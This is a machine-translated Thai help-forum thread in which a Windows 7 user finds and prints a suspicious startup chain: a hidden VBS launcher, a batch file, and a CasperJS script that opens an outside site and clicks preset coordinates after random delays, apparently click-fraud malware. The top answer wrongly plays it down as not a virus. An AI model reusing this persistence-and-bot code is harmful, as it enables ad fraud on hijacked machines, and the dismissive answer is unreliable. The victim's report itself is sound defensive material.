ไวรัส CasperJS และ“ extensafree”

0

วันนี้เมื่อฉันบูทคอมพิวเตอร์ของฉันและเมื่อ windows โหลดขึ้นมา Notepad ++ จะเปิดขึ้นซึ่งมีไฟล์ต่อไปนี้โหลดเข้ามา:

Set shell = WScript.CreateObject("WScript.Shell")
shell.Run("C:\projects\bat.bat"), 0 , True

ฉันไปตรวจสอบโฟลเดอร์ "โครงการ" และพบว่ามี 2 โปรแกรมที่เรียกว่า casperjs และ phantomjs ไฟล์ bat.bat มีรหัสต่อไปนี้อยู่:

@echo off
timeout /t 600
cd/projects
phantomjs master.js

master.js เป็นไฟล์ที่น่าสงสัยที่สุดเนื่องจากมีรหัสอยู่:

phantom.casperPath = "/projects/casperjs";
phantom.injectJs(phantom.casperPath + '/bin/bootstrap.js');

var utils = require('utils');

var casper = require('casper').create();

var mouse = require("mouse").create(casper);

casper.userAgent('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36');
casper.start('http://www.extensafree.fulba.com/views/').viewport(1200, 1000);

function getRandomIntFromRange(min, max) {
    return Math.round(Math.random() * (max - min)) + min;
}    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 6000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(190, 205);
                      });
          };    
          })(i, delay));
}    
});

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1000, 5000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

                  });
          };    
          })(i, delay));
}    
});


casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 7000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(370, 410);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(900, 400);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 18000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  casper.then(function () {
                      casper.mouse.click(400, 100);

              });    
              };
      })(i    , delay));
    }
});    

casper.then(function () {
    for (i = 0; i <= 0; i++) {
        delay = getRandomIntFromRange(1300, 8000);
        this.wait(delay, (
          function (j, d) {
              return function () {
                  this.echo(this.getTitle() + '; delay: ' + d);
                  };
      })(i, de    lay));
    }
});    

casper.then(function () {
    casper.exit();
});    

casper.run();

ฉันย้ายโฟลเดอร์เหล่านี้ทันทีและลบ shell.vbs ออกจากโฟลเดอร์เริ่มต้นของเมนูเริ่มของ windows นี่เป็นไวรัสชนิดหนึ่งหรือไม่และฉันจำเป็นต้องทำความสะอาดเพิ่มเติมอีกหรือไม่? ฉันมีโปรแกรมป้องกันไวรัส Avast รุ่นฟรีและ Windows 7 ทั้งปรับปรุงอย่างเต็มที่

windows-7  windows  virus  malware 
user1365830
แหล่งที่มา
1
ใช่; คุณกำลังติดเชื้อ ฉันขอแนะนำให้คุณล้างระบบของคุณและติดตั้ง Windows ใหม่
Ramhound

คำตอบ:

0

ฉันคิดว่านี่ไม่ใช่ไวรัสหรืออะไรทำนองนั้น

CasperJS เป็นยูทิลิตี้การเขียนสคริปต์และทดสอบการนำทางสำหรับ PhantomJS และ SlimerJS ที่เขียนด้วย Javascript

เป็นเพียงเฟรมเวิร์กของ JS ดังนั้นจึงอาจเป็นความจริงที่สคริปต์ของคุณเป็นโค้ดที่ไม่ดี! นี่คือเว็บไซต์อย่างเป็นทางการ! พวกมันเป็นโอเพ่นซอร์สดังนั้นคุณสามารถพิสูจน์ได้ทุกอย่าง! (ซอฟต์แวร์ป้องกันไวรัสส่วนใหญ่มีฟังก์ชั่นเช่น "send in" และ บริษัท จะทดสอบโปรแกรมที่ส่งมา)

Coretool
แหล่งที่มา
ในขณะที่ CasperJS เองไม่ใช่ไวรัส แต่เป็นไปได้ที่จะใช้เพื่อจุดประสงค์สามานย์ เป็นการยากที่จะบอกว่าสคริปต์ทำอะไรโดยไม่เรียกใช้ แต่ดูเหมือนว่าเป็นการจำลองการคลิกเมาส์บนไซต์สุ่มบางแห่งซึ่งไม่สามารถทำได้ดี
James P
เป็นไปได้! ลองติดต่อ CasperJS หากพวกเขารู้บางอย่างเกี่ยวกับไวรัสชื่อ CasperJS ...
Coretool
มันเป็นเฟรมเวิร์ก Javascript มันสามารถใช้งานได้ดีหรือไม่ดีไม่มีวิธีสำหรับนักพัฒนาในการควบคุมสิ่งที่คนอื่นใช้สำหรับ
James P
เรื่องจริง ... โปรดใช้ความระมัดระวังเมื่อจัดการสคริปต์ 'ต่างประเทศ'
Coretool
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.